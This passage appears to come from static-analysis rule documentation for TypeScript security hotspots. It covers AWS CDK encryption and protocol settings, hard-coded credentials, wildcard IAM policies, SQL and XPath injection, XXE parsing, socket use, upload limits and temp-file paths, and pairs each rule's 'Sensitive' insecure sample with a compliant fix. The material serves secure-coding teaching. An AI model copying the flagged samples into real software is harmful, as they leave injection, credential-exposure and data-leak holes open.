  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-http-default', {
  port: 8080,
  open: true
}); // Sensitive

alb.addListener('listener-http-explicit', {
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-http-explicit-constructor', {
  loadBalancer: alb,
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

var listenerNLB = nlb.addListener('listener-tcp-default', {
  port: 1234
}); // Sensitive

listenerNLB = nlb.addListener('listener-tcp-explicit', {
  protocol: Protocol.TCP, // Sensitive
  port: 1234
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tcp-explicit-constructor', {
  loadBalancer: nlb,
  protocol: Protocol.TCP, // Sensitive
  port: 8080
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-http', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "HTTP", // Sensitive
  port: 80
});

new CfnListener(this, 'listener-tcp', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "TCP", // Sensitive
  port: 80
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-tcp', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'tcp' // Sensitive
  }]
});

new CfnLoadBalancer(this, 'elb-http', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'http' // Sensitive
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

const loadBalancer = new LoadBalancer(this, 'elb-tcp-dict', {
  vpc,
  internetFacing: true,
  healthCheck: {
    port: 80,
  },
  listeners: [
    {
      externalPort: 10000,
      externalProtocol: LoadBalancingProtocol.TCP, // Sensitive
      internalPort: 10000
    }]
});

loadBalancer.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.TCP, // Sensitive
  internalPort:10001
});
loadBalancer.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTP, // Sensitive
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'unencrypted-implicit', {
  replicationGroupDescription: 'exampleDescription'
}); // Sensitive

new CfnReplicationGroup(this, 'unencrypted-explicit', {
  replicationGroupDescription: 'exampleDescription',
  transitEncryptionEnabled: false // Sensitive
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-implicit-unencrypted', undefined); // Sensitive

new CfnStream(this, 'cfnstream-explicit-unencrypted', {
  streamEncryption: undefined // Sensitive
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-explicit-unencrypted', {
  encryption: StreamEncryption.UNENCRYPTED // Sensitive
});

Compliant Solution

url = "https://example.com";
url = "sftp://anonymous@example.com";
url = "ssh://anonymous@example.com";

For nodemailer, one of the following options must be set:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: true,
  requireTLS: true,
  port: 465,
  secured: true
});

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-https-explicit', {
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

alb.addListener('listener-https-implicit', {
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-https-explicit', {
  loadBalancer: loadBalancer,
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

nlb.addListener('listener-tls-explicit', {
  protocol: Protocol.TLS,
  port: 1234,
  certificates: [certificate]
});

nlb.addListener('listener-tls-implicit', {
  port: 1234,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tls-explicit', {
  loadBalancer: loadBalancer,
  protocol: Protocol.TLS,
  port: 8080,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-https', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "HTTPS",
  port: 80,
  certificates: [certificate]
});

new CfnListener(this, 'listener-tls', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "TLS",
  port: 80,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-ssl', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'ssl',
    sslCertificateId: sslCertificateId
  }]
});

new CfnLoadBalancer(this, 'elb-https', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'https',
    sslCertificateId: sslCertificateId
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer, LoadBalancingProtocol } from 'aws-cdk-lib/aws-elasticloadbalancing';

const lb = new LoadBalancer(this, 'elb-ssl', {
  vpc,
  internetFacing: true,
  healthCheck: {
    port: 80,
  },
  listeners: [
    {
      externalPort:10000,
      externalProtocol:LoadBalancingProtocol.SSL,
      internalPort:10000
    }]
});

lb.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.SSL,
  internalPort:10001
});
lb.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTPS,
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'encrypted-explicit', {
  replicationGroupDescription: 'example',
  transitEncryptionEnabled: true
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream, StreamEncryption } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-implicit-encrypted');

new Stream(this, 'stream-explicit-encrypted-selfmanaged', {
  encryption: StreamEncryption.KMS,
  encryptionKey: encryptionKey,
});

new Stream(this, 'stream-explicit-encrypted-managed', {
  encryption: StreamEncryption.MANAGED
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-explicit-encrypted', {
  streamEncryption: {
    encryptionType: encryptionType,
    keyId: encryptionKey.keyId,
  }
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

typescript:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, hard-coded credentials have led to multiple publicly disclosed vulnerabilities.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken" and "secret".

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

var mysql = require('mysql');

var connection = mysql.createConnection({
  host: 'localhost',
  user: 'admin',
  database: 'project',
  password: 'mypassword', // Sensitive
  multipleStatements: true
});

connection.connect();

Compliant Solution

var mysql = require('mysql');

var connection = mysql.createConnection({
  host: process.env.MYSQL_URL,
  user: process.env.MYSQL_USERNAME,
  password: process.env.MYSQL_PASSWORD,
  database: process.env.MYSQL_DATABASE
});
connection.connect();

See

typescript:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: false, // Sensitive
});

Compliant Solution

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: true,
});

See

typescript:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. to grant identities only the permissions they need. A good practice is to start with the very minimum set of permissions and to refine the policy over time. In order to fix overly permissive policies already deployed in production, a strategy could be to review the monitored activity in order to reduce the set of permissions to those actually used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["*"], // Sensitive
    resources: ["arn:aws:iam:::user/*"],
})

Compliant Solution

A customer-managed policy that grants only the required permissions:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["iam:GetAccountSummary"],
    resources: ["arn:aws:iam:::user/*"],
})

See

typescript:S6308

Amazon OpenSearch Service is a managed service to host OpenSearch instances. It replaces Elasticsearch Service, which has been deprecated.

To harden domain (cluster) data in case of unauthorized access, OpenSearch provides data-at-rest encryption if the engine is OpenSearch (any version), or Elasticsearch with a version of 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, adversaries cannot access the data if they gain physical access to the storage medium.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt OpenSearch domains that contain sensitive information.

OpenSearch handles encryption and decryption transparently, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: opensearchservice.EngineVersion.OPENSEARCH_1_3,
}); // Sensitive, encryption must be explicitly enabled

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
}); // Sensitive, encryption must be explicitly enabled

Compliant Solution

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: opensearchservice.EngineVersion.OPENSEARCH_1_3,
  encryptionAtRest: {
    enabled: true,
  },
});

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
  encryptionAtRestOptions: {
    enabled: true,
  },
});

See

typescript:S5691

Hidden files are created automatically by many tools to save user preferences; well-known examples are .profile, .bashrc, .bash_history and .git. To simplify the view, these files are not displayed by default by operating system commands like ls.

Outside of the user environment, hidden files are sensitive because they are used to store privacy-related information or even hard-coded secrets.

Ask Yourself Whether

  • Hidden files may have been inadvertently uploaded to the static server’s public directory, and the server accepts requests for hidden files.
  • There is no business use case for serving files in .name format, but the server is not configured to reject requests for this type of file.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Disable the serving of hidden files.

Sensitive Code Example

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'allow'});   // Sensitive
app.use(serveStaticMiddleware);

Compliant Solution

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'ignore'});   // Compliant: ignore or deny are recommended values
let serveStaticDefault = serveStatic('public', { 'index': false });   // Compliant: by default, "dotfiles" (files or directories beginning with a dot) are not served, except for files located inside a directory whose name begins with a dot; see the serve-static module documentation
app.use(serveStaticMiddleware);

See

typescript:S5693

Rejecting requests with a significant content length is a good practice: it controls network traffic intensity and thus resource consumption, and helps prevent DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • 8 MB or lower for file uploads.
    • 2 MB or lower for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB

const formDefault = new Formidable(); // Sensitive, the default value is 200MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
    fileSize: 10000000 // Sensitive: 10MB is more than the recommended limit of 8MB
  }
});

let diskUploadUnlimited = multer({ // Sensitive: the default value is no limit
  storage: diskStorage,
});

body-parser module:

// 4MB is more than the recommended limit of 2MB for non-file-upload requests
let jsonParser = bodyParser.json({ limit: "4mb" }); // Sensitive
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "4mb" }); // Sensitive

Compliant Solution

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 8000000; // Compliant: 8MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
     fileSize: 8000000 // Compliant: 8MB
  }
});

body-parser module:

let jsonParser = bodyParser.json(); // Compliant, when the limit is not defined, the default value is set to 100kb
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "2mb" }); // Compliant

See

typescript:S2077

Formatted SQL queries can be difficult to maintain and debug, and concatenating untrusted values into them increases the risk of SQL injection. However, this rule doesn’t detect SQL injections (unlike rule S3649); its goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use prepared statements with bind variables (parameterized queries) instead of concatenating user input into the query string.

Sensitive Code Example

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive

Compliant Solution

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT name FROM users WHERE id = ?', [userinput], (err, res) => {});
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT name FROM users WHERE id = $1', [userinput], (err, res) => {});

Exceptions

This rule’s current implementation does not follow variables. It will only detect SQL queries which are formatted directly in the function call.

const sql = 'SELECT * FROM users WHERE id = ' + userinput;
mycon.query(sql, (err, res) => {}); // Sensitive but no issue is raised.

See

typescript:S4817

This rule is deprecated, and will eventually be removed.

Executing XPath expressions is security-sensitive and has led to vulnerabilities in the past.

User-provided data such as URL parameters should always be considered untrusted and tainted. Constructing XPath expressions directly from tainted data enables attackers to inject specially crafted values that change the initial meaning of the expression itself. Successful XPath injection attacks can read sensitive information from the XML document.

Ask Yourself Whether

  • The XPath expression might contain unsafe input coming from a user.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize any user input before using it in an XPath expression.
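One way to apply this recommendation (a sketch; the field names and the buildQuery helper are hypothetical, not part of the rule) is to validate the user-supplied value against an allowlist of known node names before it ever reaches the XPath engine:

```javascript
// Allowlist validation before building an XPath expression.
// ALLOWED_FIELDS and buildQuery are illustrative names.
const ALLOWED_FIELDS = new Set(['name', 'email', 'phone']);

function buildQuery(userField) {
  // Reject anything that is not a pre-approved node name, so
  // attacker-controlled XPath syntax is never interpolated.
  if (!ALLOWED_FIELDS.has(userField)) {
    throw new Error('Unsupported field: ' + userField);
  }
  return '/users/user/' + userField;
}
```

The string returned by buildQuery can then be passed to xpath.select safely, since its dynamic part is guaranteed to be one of the approved literals.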

Sensitive Code Example

// === Server side ===

var xpath = require('xpath');
var xmldom = require('xmldom');

var doc = new xmldom.DOMParser().parseFromString(xml);
var nodes = xpath.select(userinput, doc); // Sensitive
var node = xpath.select1(userinput, doc); // Sensitive
// === Client side ===

// Chrome, Firefox, Edge, Opera, and Safari use the evaluate() method to select nodes:
var nodes = document.evaluate(userinput, xmlDoc, null, XPathResult.ANY_TYPE, null); // Sensitive

// Internet Explorer uses its own methods to select nodes:
var nodes = xmlDoc.selectNodes(userinput); // Sensitive
var node = xmlDoc.SelectSingleNode(userinput); // Sensitive

See

typescript:S4818

This rule is deprecated, and will eventually be removed.

Using sockets is security-sensitive and has led to vulnerabilities in the past.

Sockets are vulnerable in multiple ways:

  • They enable software to interact with the outside world. As this world is full of attackers, it is necessary to check that they cannot receive sensitive information or inject dangerous input.
  • The number of sockets is limited and can be exhausted, which makes the application unresponsive to users who need additional sockets.

This rule flags code that creates sockets. It matches only the direct use of sockets, not use through frameworks or high-level APIs such as HTTP connections.

Ask Yourself Whether

  • sockets are created without any limit every time a user performs an action.
  • input received from sockets is used without being sanitized.
  • sensitive data is sent via sockets without being encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In many cases there is no need to open a socket yourself. Use existing libraries and protocols instead.
  • Encrypt all data sent if it is sensitive. It is usually better to encrypt data even if it is not sensitive, as it might change later.
  • Sanitize any input read from the socket.
  • Limit the number of sockets a given user can create. Close the sockets as soon as possible.

Sensitive Code Example

const net = require('net');

var socket = new net.Socket(); // Sensitive
socket.connect(80, 'google.com');

// net.createConnection creates a new net.Socket, initiates connection with socket.connect(), then returns the net.Socket that starts the connection
net.createConnection({ port: port }, () => {}); // Sensitive

// net.connect is an alias to net.createConnection
net.connect({ port: port }, () => {}); // Sensitive

See

typescript:S6319

Amazon SageMaker is a managed machine learning service in a hosted production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. When the data is encrypted, adversaries who gain physical access to the storage media cannot decrypt it.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance:

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';

new CfnNotebookInstance(this, 'example', {
    instanceType: 'instanceType',
    roleArn: 'roleArn'
}); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance:

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';
import { Key } from 'aws-cdk-lib/aws-kms';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});
new CfnNotebookInstance(this, 'example', {
    instanceType: 'instanceType',
    roleArn: 'roleArn',
    kmsKeyId: encryptionKey.keyId
});

See

typescript:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in libxmljs

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml, {
    noblanks: true,
    noent: true, // Noncompliant
    nocdata: true
});

Compliant solution

parseXmlString is safe by default.

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml);

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

typescript:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas, like /tmp on Linux-based systems. An application manipulating files in these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, this practice has led to multiple publicly disclosed vulnerabilities.

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see the list below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such APIs will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

const fs = require('fs');

let tmp_file = "/tmp/temporary_file"; // Sensitive
fs.readFile(tmp_file, 'utf8', function (err, data) {
  // ...
});

const fs = require('fs');

let tmp_dir = process.env.TMPDIR; // Sensitive
fs.readFile(tmp_dir + "/temporary_file", 'utf8', function (err, data) {
  // ...
});

Compliant Solution

const tmp = require('tmp');

const tmpobj = tmp.fileSync(); // Compliant

See

typescript:S1525
